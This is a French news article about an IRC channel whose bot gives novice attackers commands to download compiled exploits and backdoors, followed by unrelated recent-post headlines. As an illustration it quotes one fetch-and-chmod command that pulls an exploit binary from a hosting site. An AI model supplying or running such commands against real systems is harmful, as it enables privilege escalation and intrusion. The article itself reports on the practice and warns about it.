Pour gérer vos consentements :
Categories: Sécurité

Pirates du dimanche et IRC font bon ménage

Devenir un hacker sans mettre le nez dans le code, c’est possible ! Pour cela il faut accéder aux exploits et backdoors permettant le piratage.

Soit l’on se nomme Goldstein ou Paradox et on comprend aisément le code source de l’exploit utilisé, soit l’on est capable d’utiliser un exploit publié pour s’introduire chez la cible à pirater. Mais en ces temps de modernité il est possible, sans se fatiguer, de polluer un ennemi, un concurrent que sais-je? Et cela tout simplement, en récupérant sur un chan IRC les commandes à utiliser et l’exploit qui correspond ! L’équipe de Zataz.com a découvert un Channel ayant un bot (robot) d’une grande générosité. Ce lieu de discussion et d’échange a été mis en place par un pirate ayant soigneusement pris le temps d’infiltrer des serveurs Web sur lesquels il a placé des exploits publics ou privés qui permettent d’agir selon le mot clé spécifié. Interrogé par le webzine un utilisateur explique le fonctionnement : « Ils vont télécharger des versions compilées d’un exploit, et il ne reste plus qu’à l’exécuter. » Ainsi un utilisateur malveillant va taper une commande dans le channel par exemple !uselib ou !backdoor et ensuite il laisse travailler le bot qui va rechercher dans sa base de données s’il est en possession d’un exploit correspondant à la demande. Un service à la carte en quelque sorte. Ensuite il communique une ligne ressemblant à : « wgetwww.sitepirate.com/Odays/uselib; chmod 777 uselib » qui correspond au lieu de stockage de la bête et à la commande système pour lancer le téléchargement. Il est alors possible de changer les droits de l’exploit et de l ?exécuter. Une fois la ligne copiée le black hacker devient root c’est-à-dire qu’il est considéré comme l’administrateur de la machine cible. Cette nouvelle est inquiétante, car à force de mettre à la disposition de pirates néophytes et malintentionnés des binaires particulièrement redoutables, l’on risque de voir dans les années à venir une explosion de l’amateurisme dans le piratage. Une nouvelle qui va faire froid dans le dos des responsables de la sécurité des réseaux d’entreprise.

Recent Posts

AWS abandonne WorkDocs, son concurrent de Dropbox

Un temps pressenti pour constituer le socle d'une suite bureautique AWS, Amazon WorkDocs arrivera en…

9 heures ago

Eviden structure une marque de « serveurs IA »

Eviden regroupe cinq familles de serveurs sous la marque BullSequana AI. Et affiche le supercalculateur…

13 heures ago

SSE : l’expérience se simplifie plus que les prix

Le dernier Magic Quadrant du SSE (Secure Service Edge) dénote des tarifications et des modèles…

15 heures ago

IA générative : les lignes directrices de l’ANSSI

Formats de paramètres, méthodes d'apprentissage, mutualisation GPU... Voici quelques-unes des recommandations de l'ANSSI sur l'IA…

1 jour ago

De la marque blanche à l’« exemption souveraine », Broadcom fait des concessions aux fournisseurs cloud

À la grogne des partenaires VMware, Broadcom répond par diverses concessions.

2 jours ago

iPadOS finalement soumis au DMA

iPadOS a une position suffisamment influente pour être soumis au DMA, estime la Commission européenne.

2 jours ago